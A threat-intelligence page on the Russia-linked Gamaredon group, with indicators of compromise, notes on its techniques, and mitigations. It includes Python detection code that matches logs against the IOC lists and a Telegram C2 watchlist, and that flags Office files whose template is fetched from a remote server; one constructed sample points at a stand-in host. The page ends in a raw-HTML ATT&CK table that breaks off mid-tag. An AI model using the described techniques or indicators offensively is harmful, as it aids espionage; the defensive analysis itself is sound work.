SOC Incident Toolkit
Gamaredon Steals Data Too Quickly

Aliases: Gamaredon, UAC-0010, Shuckworm, Actinium, Armageddon, Primitive Bear, Trident Ursa, DEV-0157

The Computer Emergency Response Team of Ukraine (CERT-UA) warns that the Russia-linked APT group Gamaredon (aka UAC-0010) begins stealing data as soon as 30 minutes after the initial compromise.

Indicators of Compromise

Domains (2976)

aukci.space
itango.space
bitsadmin7.space
gulif.space
anadima.website
barrigal.space
delile.space
frondo.xyz
caryophyllus.space
gameland.website
beepapa.space
dortama.space
bitsbitsg.space
bergius.space
fuagrado.space
huvasi.website
chachand.space
davaris.space
firecor.space
denovar.space
+2956 more

Hashes (877)

b449513b9eeaace805518125def9edf11b63567701a9275b6dd1bddf831f035f
b2c4a9242b8dda270b7742b026812011b733fd7aff12d7f4a242678ee954ed8b
e4afb1d75061ec13d1988bc4990b352cf2a7d474133c3474fd0c3c2e0672fca0
06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397
f216bafa84123bacaabdf4ad622eb80d0e2d8425fd8937dc100d65bdc1af725e
ee29eb3980dff9034b1c539a799cedc1428224855e6d515d81da226448b81521
d546e63f4d4922f0eeeed4203991384a503182fa735c4d779ddc111f04926ecf
b7bd622b279d3d3927daa64c7c9bc97887d85fccf360d46158e1c01c96bb6cb5
db49fe96714ebd9707e5cd31e7f366016e45926ff577cce9c34a73ee1b6efcf9
f6fe720f10737e0fdce27de90bdff3f63948c4b05f74b86b11f9b4439e0943d3
ad5759e59dde3338a7c352417331a2faf1465c20205aa865fd474060f7bac8c7
e78a4ac2af9e94e7ae2c8e8d7099c6449562dc78cd3ce325e7d70da58773740c
9ac8ad208c37d0176d2b449cfa175e21881b2b37980a716ab6ba591921da8f6f
a078871d89d3f8d22ed77dc331000529a0598f27cf56c6eda32943a9ee8a952c
cd73621d52d0c17849cfff55b67961dee1671159e4dd5f2095960a042a20e1c7
e188697ef88856063f97dfc8cf8739daeb5d54ac8a551f6d5c325cf8b0466834
bfa0a68e897ed7282b49663058f53daa94d273d8f09e20151e39616cafa4d366
aa340165930c9d688f58eb408dd7ec1eb55e0dd02e6131465ac31bfb24aa82a7
2e183b3b6750d0b891a14a193965c918ecec9a36436d41a68a01b91066e5c4d4
752fa0282a743628580d179d3bf2358d
+857 more

IPv4 (1241)

185.46.9.81
194.67.109.191
89.108.77.204
89.108.76.226
89.108.78.82
194.58.98.215
188.225.86.146
194.58.92.102
151.248.114.88
193.164.150.111
195.62.53.63
151.248.121.176
194.67.116.81
194.67.116.180
185.46.10.143
194.58.122.110
89.108.83.235
151.248.114.67
194.67.109.90
92.242.62.181
+1221 more

CVEs (5)

CVE-2007-5633
CVE-2017-0144
CVE-2017-0199
CVE-2019-0708
CVE-2017-11882
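The lists above are only useful once they are loaded into something that matches them against telemetry. The following is an added example (not code from this page or from CERT-UA/SOCRadar) of a minimal IOC matcher: it validates each indicator by type, drops malformed entries instead of guessing, matches hostnames against domain indicators up to each parent label (so a lookup of files.aukci.space hits the aukci.space indicator), and compares hashes case-insensitively. The indicators embedded in it are a handful copied from the lists above; the Telegram and Telegraph hostnames come from the Notes section, which reports those services being abused for C2, and are kept on a separate lower-confidence watchlist because they are legitimate services. The log lines are constructed for the example and are not real telemetry.

```python
from __future__ import annotations

import re
from collections import defaultdict

# A handful of indicators copied from the lists on this page (domains, IPv4
# addresses, one SHA-256 and one MD5). The two service hostnames are not page
# IOCs: the Notes report Telegram and Telegraph being abused for C2, so they go
# on a separate, lower-confidence watchlist rather than the blocklist.
PAGE_IOCS = [
    "aukci.space", "itango.space", "bitsadmin7.space", "gulif.space",
    "anadima.website", "frondo.xyz",
    "185.46.9.81", "194.58.98.215", "151.248.114.88",
    "b449513b9eeaace805518125def9edf11b63567701a9275b6dd1bddf831f035f",
    "752fa0282a743628580d179d3bf2358d",
]
SERVICE_WATCHLIST = ["api.telegram.org", "telegra.ph"]

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
MD5_RE = re.compile(r"^[0-9a-f]{32}$")
OCTET = r"(?:25[0-5]|2[0-4]\d|1?\d?\d)"
IPV4_RE = re.compile(rf"^(?:{OCTET}\.){{3}}{OCTET}$")
DOMAIN_RE = re.compile(r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$")

# Token extractors for free-form log lines (lines are lowercased first).
HEX_TOKEN_RE = re.compile(r"\b[0-9a-f]{64}\b|\b[0-9a-f]{32}\b")
IP_TOKEN_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_TOKEN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,63}\b")


def classify_ioc(value: str) -> str | None:
    """Return the indicator type, or None if the string is not a usable IOC."""
    v = value.strip().lower()
    if SHA256_RE.match(v):
        return "sha256"
    if MD5_RE.match(v):
        return "md5"
    if IPV4_RE.match(v):
        return "ipv4"
    if DOMAIN_RE.match(v):
        return "domain"
    return None


def build_index(iocs, watchlist=()) -> dict[str, set[str]]:
    """Bucket indicators by type; malformed entries are dropped, not guessed."""
    index: dict[str, set[str]] = defaultdict(set)
    for v in iocs:
        kind = classify_ioc(v)
        if kind:
            index[kind].add(v.strip().lower())
    for host in watchlist:
        index["watchlist"].add(host.strip().lower())
    return index


def parent_match(host: str, domains: set[str]) -> str | None:
    """Match a hostname against a domain set, walking up through its parents
    (files.aukci.space matches an indicator of aukci.space)."""
    labels = host.split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in domains:
            return candidate
    return None


def match_line(line: str, index: dict[str, set[str]]) -> list[tuple[str, str]]:
    """Return sorted, de-duplicated (type, indicator) hits for one log line."""
    low = line.lower()
    hits: set[tuple[str, str]] = set()
    for tok in HEX_TOKEN_RE.findall(low):
        kind = "sha256" if len(tok) == 64 else "md5"
        if tok in index[kind]:
            hits.add((kind, tok))
    for tok in IP_TOKEN_RE.findall(low):
        if tok in index["ipv4"]:
            hits.add(("ipv4", tok))
    for tok in HOST_TOKEN_RE.findall(low):
        for bucket in ("domain", "watchlist"):
            found = parent_match(tok, index[bucket])
            if found:
                hits.add((bucket, found))
    return sorted(hits)


def scan(lines, index) -> list[tuple[int, list[tuple[str, str]]]]:
    """Return (line number, hits) for every line with at least one hit."""
    results = []
    for n, line in enumerate(lines):
        hits = match_line(line, index)
        if hits:
            results.append((n, hits))
    return results


# Constructed sample log lines (DNS, proxy and EDR style); not real telemetry.
SAMPLE_LOGS = [
    "2023-06-12T09:14:02Z dns client=10.0.4.17 query=files.aukci.space type=A",
    "2023-06-12T09:14:03Z proxy client=10.0.4.17 url=http://194.58.98.215/get.php status=200",
    "2023-06-12T09:15:40Z edr host=WS-0417 proc=winword.exe file=report.dotm sha256=B449513B9EEAACE805518125DEF9EDF11B63567701A9275B6DD1BDDF831F035F",
    "2023-06-12T09:16:05Z proxy client=10.0.4.17 url=https://api.telegram.org/bot0/getUpdates status=200",
    "2023-06-12T09:20:11Z dns client=10.0.4.22 query=www.example.com type=A",
]

if __name__ == "__main__":
    idx = build_index(PAGE_IOCS, SERVICE_WATCHLIST)
    for n, hits in scan(SAMPLE_LOGS, idx):
        print(n, hits)
```

Two design choices matter in practice: the watchlist is reported under its own bucket so an analyst can tune it separately from true-positive blocklist hits (plenty of organizations have legitimate Telegram traffic), and domain matching walks parent labels, because the staging hosts in a campaign like this rotate subdomains under the registered domains listed above.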

APT Groups

Gamaredon Group

Russian Federation

Notes

Actor and Target: The Gamaredon Group has specifically targeted Ukrainian government, law enforcement and military entities, mainly for cyber espionage. This suggests Russia is using cyber operations to gather information on Ukraine and gain a tactical advantage.

Techniques Used: The attacks have been delivered as .docx and .dotm files using remote template injection. The document carries a relationship entry pointing at a template hosted on an attacker-controlled URL; Word fetches that template automatically when the document is opened, and the malicious content arrives with it rather than being present in the attachment itself.

Malware Propagation: During the attacks the malware was observed propagating by copying itself onto removable disks (e.g., USB drives), which also gives it a path into air-gapped networks.

C&C Servers: The threat actors used legitimate services as Command and Control (C&C) channels, specifically the Telegram messaging service and the Telegraph microblogging platform.

Attack Timing and Detection Process: Most of these attacks started in February/March 2023, and the threat actors were not detected on target networks until May. In some attacks they breached the human resources departments of various organizations to gather intelligence about personnel.

CONCLUSIONS:

Based on the analysis of the Gamaredon Group's tactics and techniques, the following mitigations can be put into practice:

1. User Education: One of the most effective mitigations is teaching users the risks of opening unsolicited or suspicious files. Since the group delivers .docx and .dotm files that pull in malicious content, users should be taught to treat unexpected Office attachments as dangerous.

2. Secure Network Connections: Use secure, encrypted network connections to prevent man-in-the-middle attacks and other forms of eavesdropping.

3. Regular Patching and Updating: The group exploits known vulnerabilities (see the CVEs listed above), so keeping all software patched and up to date is vital.

4. Endpoint Protection and Antivirus Software: Use robust endpoint protection and antivirus software to detect and mitigate threats. Prefer products with behavior-based detection, which can catch new, as yet unknown variants.

5. Monitor Removable Media: Given the group's use of USB drives to spread, monitor and control the use of removable media within the organization.

6. Limiting Access: Apply the principle of least privilege to system and application permissions. Only provide access to those who absolutely need it.

7. Intrusion Detection Systems (IDS): Employ intrusion detection to monitor network traffic for suspicious activity; the domains and IP addresses listed above can be loaded as detection or blocking rules.

8. Incident Response Plan: Prepare an incident response plan so that a detected intrusion or attack can be handled swiftly and effectively.

9. Regular Auditing and Logging: Maintain detailed logs and perform regular audits so that normal baseline behavior is known and deviations from it stand out.

10. Harden Systems: Limit the attack surface by disabling unnecessary services, protocols and software.

Remember, no single solution can provide complete protection against sophisticated cyber attacks. Instead, SOCRadar Attack Surface Management (https://socradar.io/suites/attack-surface-management/) would be more effective, covering multiple potential attack vectors.
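Remote template injection leaves a static trace that can be checked without opening the document: an OOXML relationship with TargetMode="External" of type attachedTemplate (or oleObject, the linked-OLE pattern behind CVE-2017-0199, which is in the CVE list above). The following is an added example, not code from this page or from CERT-UA/SOCRadar, of a mail-gateway or triage check that unpacks a .docx/.dotm, parses only its *.rels parts and reports such relationships. It distinguishes a network target (a URL or UNC path, which causes an outbound fetch on open) from a locally attached template such as Normal.dotm, which is normal and should not be flagged. The sample documents and the template URL template.example are constructed for the example; the real lures and staging domains are not reproduced.

```python
from __future__ import annotations

import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# External relationships of these types are fetched by Word on open without a
# prompt: attachedTemplate is the remote template injection described on this
# page; oleObject is the linked-OLE pattern behind CVE-2017-0199 (also listed).
SUSPECT_TYPES = {
    OFFICE_REL + "attachedTemplate": "remote_template",
    OFFICE_REL + "oleObject": "remote_ole_link",
}
NETWORK_SCHEMES = {"http", "https", "ftp"}


def find_external_links(docx_bytes: bytes) -> list[dict]:
    """List every External relationship of a suspect type in a .docx/.dotm.

    Only the *.rels parts inside the OOXML zip are parsed, so nothing in the
    document is rendered or executed.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                kind = SUSPECT_TYPES.get(rel.get("Type", ""))
                if kind is None:
                    continue  # hyperlinks and the like are External by design
                target = rel.get("Target", "")
                findings.append({
                    "part": part,
                    "id": rel.get("Id"),
                    "kind": kind,
                    "target": target,
                    "scheme": urlsplit(target).scheme.lower(),
                })
    return findings


def is_network_target(finding: dict) -> bool:
    """True when opening the document would cause an outbound fetch (URL or UNC
    path). A locally attached template (file:///...Normal.dotm) is not flagged."""
    return finding["scheme"] in NETWORK_SCHEMES or finding["target"].startswith("\\\\")


def triage(docx_bytes: bytes) -> str:
    """Collapse findings to one verdict: 'remote', 'local-only' or 'clean'."""
    findings = find_external_links(docx_bytes)
    if any(is_network_target(f) for f in findings):
        return "remote"
    return "local-only" if findings else "clean"


# --- constructed sample documents (not the real lures from this campaign) ---
REL_OPEN = f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{PKG_REL_NS}">'
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    '<Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/>'
    "</Types>"
)
ROOT_RELS = REL_OPEN + f'<Relationship Id="rId1" Type="{OFFICE_REL}officeDocument" Target="word/document.xml"/></Relationships>'
DOC_RELS = REL_OPEN + f'<Relationship Id="rId1" Type="{OFFICE_REL}settings" Target="settings.xml"/></Relationships>'
DOCUMENT_XML = ('<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                "<w:body><w:p><w:r><w:t>Quarterly report</w:t></w:r></w:p></w:body></w:document>")
SETTINGS_XML = ('<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
                f'xmlns:r="{OFFICE_REL[:-1]}"><w:attachedTemplate r:id="rId1"/></w:settings>')
# Hypothetical template URL; the campaign's real staging domains are in the IOC lists.
REMOTE_TEMPLATE_RELS = REL_OPEN + (
    f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
    'Target="http://template.example/quarterly.dotm" TargetMode="External"/></Relationships>'
)
LOCAL_TEMPLATE_RELS = REL_OPEN + (
    f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
    'Target="file:///C:/Users/analyst/AppData/Roaming/Microsoft/Templates/Normal.dotm" TargetMode="External"/></Relationships>'
)


def build_docx(settings_rels: str | None) -> bytes:
    """Assemble a minimal OOXML package; settings_rels=None gives a document
    with no attached template at all."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES)
        zf.writestr("_rels/.rels", ROOT_RELS)
        zf.writestr("word/document.xml", DOCUMENT_XML)
        zf.writestr("word/settings.xml", SETTINGS_XML)
        zf.writestr("word/_rels/document.xml.rels", DOC_RELS)
        if settings_rels is not None:
            zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for label, rels in (("lure", REMOTE_TEMPLATE_RELS), ("normal", LOCAL_TEMPLATE_RELS), ("plain", None)):
        doc = build_docx(rels)
        print(label, triage(doc), find_external_links(doc))
```

Because the check reads only relationship XML, it is cheap enough to run on every inbound Office attachment; the target URL it extracts is also the first thing to pivot on against the domain and IP lists above.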

Mitigation

Gamaredon Group (https://attack.mitre.org/groups/G0047) is a suspected Russian cyber espionage threat group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013. The name Gamaredon Group comes from a misspelling of the word "Armageddon", which was detected in the adversary's early campaigns. [1][2][3][4][5]

In November 2021, the Ukrainian government publicly attributed Gamaredon Group to Russia's Federal Security Service (FSB) Center 18. [6][5]

Associated Group Descriptions

Name | Description
IRON TILDEN | [7] https://www.secureworks.com/research/threat-profiles/iron-tilden
Primitive Bear | [8] https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/
ACTINIUM | [5] https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/
Armageddon | [4] https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine
Shuckworm | [4] https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine
DEV-0157 | [5] https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

Techniques Used

Domain | ID | Name | Use
Enterprise | T1583.001 (https://attack.mitre.org/techniques/T1583/001) | Acquire Infrastructure: Domains | Gamaredon Group has registered multiple domains to facilitate payload staging and C2. [5][8]
Enterprise | T1071.001 (https://attack.mitre.org/techniques/T1071/001) | Application Layer Protocol: Web Protocols |
style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used HTTP and HTTPS for C2 communications.</span><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; 
font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1119"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; 
font-variant-alternates: normal; vertical-align: baseline;">T1119</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1119"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Automated Collection</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has deployed scripts on compromised systems that automatically scan for interesting documents.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: 
baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1020"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1020</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1020"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Automated Exfiltration</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 
0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used modules that automatically upload gathered documents to the C2 server.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:56.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 
8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1547"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1547</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1547/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1547"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Boot or Logon Autostart Execution</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1547/001"><span 
style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Registry Run Keys / Startup Folder</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> tools have registered Run keys in the registry to give malicious VBS files persistence.</span><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a 
